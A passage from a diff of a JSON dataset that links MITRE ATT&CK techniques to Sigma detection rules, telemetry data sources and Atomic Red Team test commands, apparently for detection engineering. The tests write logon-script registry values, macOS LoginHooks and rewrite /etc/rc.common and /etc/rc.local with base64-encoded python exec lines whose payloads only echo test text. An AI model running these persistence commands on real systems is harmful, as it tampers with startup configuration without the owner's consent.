"9fff585c-c33e-4a86-b3cd-39312079a65f", + "status": "experimental", + "description": "Detects the creation of taskmgr.exe process in context of LOCAL_SYSTEM", + "tags": [ + "attack.defense_evasion", + "attack.t1036" + ], + "author": "Florian Roth", + "date": "2018/03/18", + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "User": "NT AUTHORITY\\SYSTEM", + "Image": "*\\taskmgr.exe" + }, + "condition": "selection" + }, + "falsepositives": [ + "Unkown" + ], + "level": "high" + }, + { + "title": "Taskmgr as Parent", + "id": "3d7679bd-0c00-440c-97b0-3f204273e6c7", + "status": "experimental", + "description": "Detects the creation of a process from Windows task manager", + "tags": [ + "attack.defense_evasion", + "attack.t1036" + ], + "author": "Florian Roth", + "date": "2018/03/13", + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "ParentImage": "*\\taskmgr.exe" + }, + "filter": { + "Image": [ + "*\\resmon.exe", + "*\\mmc.exe", + "*\\taskmgr.exe" + ] + }, + "condition": "selection and not filter" + }, + "fields": [ + "Image", + "CommandLine", + "ParentCommandLine" + ], + "falsepositives": [ + "Administrative activity" + ], + "level": "low" + }, + { + "title": "System File Execution Location Anomaly", + "id": "e4a6b256-3e47-40fc-89d2-7a477edd6915", + "status": "experimental", + "description": "Detects a Windows program executable started in a suspicious folder", + "references": [ + "https://twitter.com/GelosSnake/status/934900723426439170" + ], + "author": "Florian Roth, Patrick Bareiss", + "date": "2017/11/27", + "tags": [ + "attack.defense_evasion", + "attack.t1036" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "Image": [ + "*\\svchost.exe", + "*\\rundll32.exe", + "*\\services.exe", + "*\\powershell.exe", + "*\\regsvr32.exe", + "*\\spoolsv.exe", + "*\\lsass.exe", + "*\\smss.exe", + "*\\csrss.exe", + "*\\conhost.exe", + "*\\wininit.exe", + "*\\lsm.exe", + "*\\winlogon.exe", + "*\\explorer.exe", + "*\\taskhost.exe" + ] + }, + "filter": { + "Image": [ + "C:\\Windows\\System32\\\\*", + "C:\\Windows\\SysWow64\\\\*", + "C:\\Windows\\explorer.exe", + "C:\\Windows\\winsxs\\\\*" + ] + }, + "condition": "selection and not filter" + }, + "falsepositives": [ + "Exotic software" + ], + "level": "high" + }, + [ + "4688", + "Process Execution" + ], + [ + "4663", + "File monitoring" + ], + [ + "File Hashing" + ], + [ + "B9", + "Binary file metadata" + ], + [ + "4688", + "Process Execution" + ], + [ + "4663", + "File monitoring" + ], + [ + "LOG-MD", + "File Hashing" + ], + [ + "LOG-MD - B9", + "Binary file metadata" + ], + { + "data_source": "image", + "definition": "Information about a virtual machine image.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "image metadata", + "description": "Data and information that describe an image and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "image" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service metadata", + "description": "Data and information that describe a service and activity around it.", + "source_data_element": "service", + "relationship": "started", + "target_data_element": null + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service metadata", + "description": "Data and information that describe a service and activity around it.", + "source_data_element": "service", + "relationship": "stopped", + "target_data_element": null + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service metadata", + "description": "Data and information that describe a service and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "service" + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service metadata", + "description": "Data and information that describe a service and activity around it.", + "source_data_element": "process", + "relationship": "retrieved information about", + "target_data_element": "service" + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service creation", + "description": "A service/daemon was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "service" + }, + { + "data_source": "scheduled job", + "definition": "Information about scheduled work that run automatically in the background of a computer system (Cron deamon, Task Scheduler, BITS).", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Containers" + ], + "data_component": "scheduled job metadata", + "description": "Data and information that describe a scheduled job and activity around it.", + "source_data_element": "host", + "relationship": "retrieved information about", + "target_data_element": "scheduled job" + }, + { + "data_source": "scheduled job", + "definition": "Information about scheduled work that run automatically in the background of a computer system (Cron deamon, Task Scheduler, BITS).", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Containers" + ], + "data_component": "scheduled job modification", + "description": "A scheduled job was modified (e.g., the executable launched by the task was changed), either locally or remotely.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "scheduled job" + }, + { + "data_source": "scheduled job", + "definition": "Information about scheduled work that run automatically in the background of a computer system (Cron deamon, Task Scheduler, BITS).", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Containers" + ], + "data_component": "scheduled job modification", + "description": "A scheduled job was modified (e.g., the executable launched by the task was changed), either locally or remotely.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "scheduled job" + }, + { + "data_source": "scheduled job", + "definition": "Information about scheduled work that run automatically in the background of a computer system (Cron deamon, Task Scheduler, BITS).", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Containers" + ], + "data_component": "scheduled job modification", + "description": "A scheduled job was modified (e.g., the executable launched by the task was changed), either locally or remotely.", + "source_data_element": "user", + "relationship": "enabled", + "target_data_element": "scheduled job" + }, + { + "data_source": "scheduled job", + "definition": "Information about scheduled work that run automatically in the background of a computer system (Cron deamon, Task Scheduler, BITS).", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Containers" + ], + "data_component": "scheduled job modification", + "description": "A scheduled job was modified (e.g., the executable launched by the task was changed), either locally or remotely.", + "source_data_element": "process", + "relationship": "enabled", + "target_data_element": "scheduled job" + }, + { + "data_source": "scheduled job", + "definition": "Information about scheduled work that run automatically in the background of a computer system (Cron deamon, Task Scheduler, BITS).", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Containers" + ], + "data_component": "scheduled job modification", + "description": "A scheduled job was modified (e.g., the executable launched by the task was changed), either locally or remotely.", + "source_data_element": "user", + "relationship": "disabled", + "target_data_element": "scheduled job" + }, + { + "data_source": "scheduled job", + "definition": "Information about scheduled work that run automatically in the background of a computer system (Cron deamon, Task Scheduler, BITS).", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Containers" + ], + "data_component": "scheduled job modification", + "description": "A scheduled job was modified (e.g., the executable launched by the task was changed), either locally or remotely.", + "source_data_element": "process", + "relationship": "disabled", + "target_data_element": "scheduled job" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file stream" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "retrieved information about", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "file" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process metadata", + "description": "Data and information that describe a process (Such as environment variables) and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "process" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + } + ], + "external_reference": [ + "http://researchcenter.paloaltonetworks.com/2017/02/unit42-menupass-returns-new-malware-new-attacks-japanese-academics-organizations/", + "https://www.fireeye.com/blog/threat-research/2018/03/iranian-threat-group-updates-ttps-in-spear-phishing-campaign.html", + "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html", + "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report-appendix.zip", + "https://twitter.com/ItsReallyNick/status/945681177108762624", + "https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html", + "https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf", + "https://www.symantec.com/connect/blogs/sowbug-cyber-espionage-group-targets-south-american-and-southeast-asian-governments", + "https://www.justice.gov/opa/press-release/file/1121706/download", + "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses", + "http://blog.morphisec.com/fin7-attacks-restaurant-industry", + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08064518/Carbanak_APT_eng.pdf", + "https://s3-us-west-2.amazonaws.com/cymmetria-blog/public/Unveiling_Patchwork.pdf", + "https://www.us-cert.gov/ncas/alerts/TA17-293A", + "https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html", + "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf", + "https://www.fireeye.com/blog/threat-research/2019/04/triton-actor-ttp-profile-custom-attack-tools-detections.html", + "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-ke3chang.pdf", + "http://researchcenter.paloaltonetworks.com/2016/01/scarlet-mimic-years-long-espionage-targets-minority-activists/", + "https://www.us-cert.gov/ncas/alerts/TA18-074A", + "https://securelist.com/poseidon-group-a-targeted-attack-boutique-specializing-in-global-cyber-espionage/73673/", + "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf", + [ + "https://docs.microsoft.com/en-us/azure/virtual-machines/windows/capture-image-resource", + "https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/AMIs.html" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/dotnet/framework/windows-services/introduction-to-windows-service-applications", + "https://www.linux.com/news/introduction-services-runlevels-and-rcd-scripts/" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/taskschd/tasks" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ] + ] + }, + { + "technique_id": "T1037.001", + "command_list": [ + "echo \"#{script_command}\" > %temp%\\art.bat\nREG.exe ADD HKCU\\Environment /v UserInitMprLogonScript /t REG_SZ /d \"%temp%\\art.bat\" /f\n", + "echo \"echo Art \"Logon Script\" atomic test was successful. >> %USERPROFILE%\\desktop\\T1037.001-log.txt\" > #{script_path}\nREG.exe ADD HKCU\\Environment /v UserInitMprLogonScript /t REG_SZ /d \"#{script_path}\" /f\n" + ], + "commands": [ + { + "command": "echo \"#{script_command}\" > %temp%\\art.bat\nREG.exe ADD HKCU\\Environment /v UserInitMprLogonScript /t REG_SZ /d \"%temp%\\art.bat\" /f\n", + "source": "atomics/T1037.001/T1037.001.yaml", + "name": "Atomic Red Team Test - Boot or Logon Initialization Scripts: Logon Script (Windows)" + }, + { + "command": "echo \"echo Art \"Logon Script\" atomic test was successful. >> %USERPROFILE%\\desktop\\T1037.001-log.txt\" > #{script_path}\nREG.exe ADD HKCU\\Environment /v UserInitMprLogonScript /t REG_SZ /d \"#{script_path}\" /f\n", + "source": "atomics/T1037.001/T1037.001.yaml", + "name": "Atomic Red Team Test - Boot or Logon Initialization Scripts: Logon Script (Windows)" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1037.001", + "display_name": "Boot or Logon Initialization Scripts: Logon Script (Windows)", + "atomic_tests": [ + { + "name": "Logon Scripts", + "auto_generated_guid": "d6042746-07d4-4c92-9ad8-e644c114a231", + "description": "Adds a registry value to run batch script created in the %temp% directory. Upon execution, there will be a new environment variable in the HKCU\\Environment key\nthat can be viewed in the Registry Editor.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "script_path": { + "description": "Path to .bat file", + "type": "String", + "default": "%temp%\\art.bat" + }, + "script_command": { + "description": "Command To Execute", + "type": "String", + "default": "echo Art \"Logon Script\" atomic test was successful. >> %USERPROFILE%\\desktop\\T1037.001-log.txt" + } + }, + "executor": { + "command": "echo \"#{script_command}\" > #{script_path}\nREG.exe ADD HKCU\\Environment /v UserInitMprLogonScript /t REG_SZ /d \"#{script_path}\" /f\n", + "cleanup_command": "REG.exe DELETE HKCU\\Environment /v UserInitMprLogonScript /f >nul 2>&1\ndel #{script_path} >nul 2>&1\ndel \"%USERPROFILE%\\desktop\\T1037.001-log.txt\" >nul 2>&1\n", + "name": "command_prompt" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key creation", + "description": "A registry key was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key creation", + "description": "A registry key was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "windows registry key value" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1037.002", + "command_list": [], + "commands": [], + "parsed_datasets": [ + { + "attack_technique": "T1037.002", + "display_name": "Boot or Logon Initialization Scripts: Logon Script (Mac)", + "atomic_tests": [ + { + "name": "Logon Scripts - Mac", + "auto_generated_guid": "f047c7de-a2d9-406e-a62b-12a09d9516f4", + "description": "Mac logon script\n", + "supported_platforms": [ + "macos" + ], + "executor": { + "steps": "1. Create the required plist file\n\n sudo touch /private/var/root/Library/Preferences/com.apple.loginwindow.plist\n\n2. Populate the plist with the location of your shell script\n\n sudo defaults write com.apple.loginwindow LoginHook /Library/Scripts/AtomicRedTeam.sh\n\n3. Create the required plist file in the target user's Preferences directory\n\n\t touch /Users/$USER/Library/Preferences/com.apple.loginwindow.plist\n\n4. Populate the plist with the location of your shell script\n\n\t defaults write com.apple.loginwindow LoginHook /Library/Scripts/AtomicRedTeam.sh\n", + "name": "manual" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1037.004", + "command_list": [ + "sudo echo osascript -e 'tell app \"Finder\" to display dialog \"Hello World\"' >> /etc/rc.common\n", + "filename='/etc/rc.common';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.common.original;fi\nprintf '%s\\n' '#!/bin/bash' | sudo tee /etc/rc.common\necho \"python3 -c \\\"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMuY29tbW9uID4gL3RtcC9UMTAzNy4wMDQucmMuY29tbW9uJykK'))\\\"\" | sudo tee -a /etc/rc.common\nprintf '%s\\n' 'exit 0' | sudo tee -a /etc/rc.common\nsudo chmod +x /etc/rc.common\n", + "filename='/etc/rc.local';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.local.original;fi\nprintf '%s\\n' '#!/bin/bash' | sudo tee /etc/rc.local\necho \"python3 -c \\\"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMubG9jYWwgPiAvdG1wL1QxMDM3LjAwNC5yYy5sb2NhbCcpCgo='))\\\"\" | sudo tee -a /etc/rc.local\nprintf '%s\\n' 'exit 0' | sudo tee -a /etc/rc.local\nsudo chmod +x /etc/rc.local\n" + ], + "commands": [ + { + "command": "sudo echo osascript -e 'tell app \"Finder\" to display dialog \"Hello World\"' >> /etc/rc.common\n", + "source": "atomics/T1037.004/T1037.004.yaml", + "name": "Atomic Red Team Test - Boot or Logon Initialization Scripts: Rc.common" + }, + { + "command": "filename='/etc/rc.common';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.common.original;fi\nprintf '%s\\n' '#!/bin/bash' | sudo tee /etc/rc.common\necho \"python3 -c \\\"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMuY29tbW9uID4gL3RtcC9UMTAzNy4wMDQucmMuY29tbW9uJykK'))\\\"\" | sudo tee -a /etc/rc.common\nprintf '%s\\n' 'exit 0' | sudo tee -a /etc/rc.common\nsudo chmod +x /etc/rc.common\n", + "source": "atomics/T1037.004/T1037.004.yaml", + "name": "Atomic Red Team Test - Boot or Logon Initialization Scripts: Rc.common" + }, + { + "command": "filename='/etc/rc.local';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.local.original;fi\nprintf '%s\\n' '#!/bin/bash' | sudo tee /etc/rc.local\necho \"python3 -c \\\"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMubG9jYWwgPiAvdG1wL1QxMDM3LjAwNC5yYy5sb2NhbCcpCgo='))\\\"\" | sudo tee -a /etc/rc.local\nprintf '%s\\n' 'exit 0' | sudo tee -a /etc/rc.local\nsudo chmod +x /etc/rc.local\n", + "source": "atomics/T1037.004/T1037.004.yaml", + "name": "Atomic Red Team Test - Boot or Logon Initialization Scripts: Rc.common" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1037.004", + "display_name": "Boot or Logon Initialization Scripts: Rc.common", + "atomic_tests": [ + { + "name": "rc.common", + "auto_generated_guid": "97a48daa-8bca-4bc0-b1a9-c1d163e762de", + "description": "Modify rc.common\n\n[Reference](https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/StartupItems.html)\n", + "supported_platforms": [ + "macos" + ], + "executor": { + "command": "sudo echo osascript -e 'tell app \"Finder\" to display dialog \"Hello World\"' >> /etc/rc.common\n", + "elevation_required": true, + "name": "bash" + } + }, + { + "name": "rc.common", + "auto_generated_guid": "c33f3d80-5f04-419b-a13a-854d1cbdbf3a", + "description": "Modify rc.common\n", + "supported_platforms": [ + "linux" + ], + "executor": { + "name": "bash", + "elevation_required": true, + "command": "filename='/etc/rc.common';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.common.original;fi\nprintf '%s\\n' '#!/bin/bash' | sudo tee /etc/rc.common\necho \"python3 -c \\\"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMuY29tbW9uID4gL3RtcC9UMTAzNy4wMDQucmMuY29tbW9uJykK'))\\\"\" | sudo tee -a /etc/rc.common\nprintf '%s\\n' 'exit 0' | sudo tee -a /etc/rc.common\nsudo chmod +x /etc/rc.common\n", + "cleanup_command": "origfilename='/etc/rc.common.original';if [ ! -f $origfilename ];then sudo rm /etc/rc.common;else sudo cp $origfilename /etc/rc.common && sudo rm $origfilename;fi\n" + } + }, + { + "name": "rc.local", + "auto_generated_guid": "126f71af-e1c9-405c-94ef-26a47b16c102", + "description": "Modify rc.local\n", + "supported_platforms": [ + "linux" + ], + "executor": { + "name": "bash", + "elevation_required": true, + "command": "filename='/etc/rc.local';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.local.original;fi\nprintf '%s\\n' '#!/bin/bash' | sudo tee /etc/rc.local\necho \"python3 -c \\\"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMubG9jYWwgPiAvdG1wL1QxMDM3LjAwNC5yYy5sb2NhbCcpCgo='))\\\"\" | sudo tee -a /etc/rc.local\nprintf '%s\\n' 'exit 0' | sudo tee -a /etc/rc.local\nsudo chmod +x /etc/rc.local\n", + "cleanup_command": "origfilename='/etc/rc.local.original';if [ ! -f $origfilename ];then sudo rm /etc/rc.local;else sudo cp $origfilename /etc/rc.local && sudo rm $origfilename;fi\n" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + 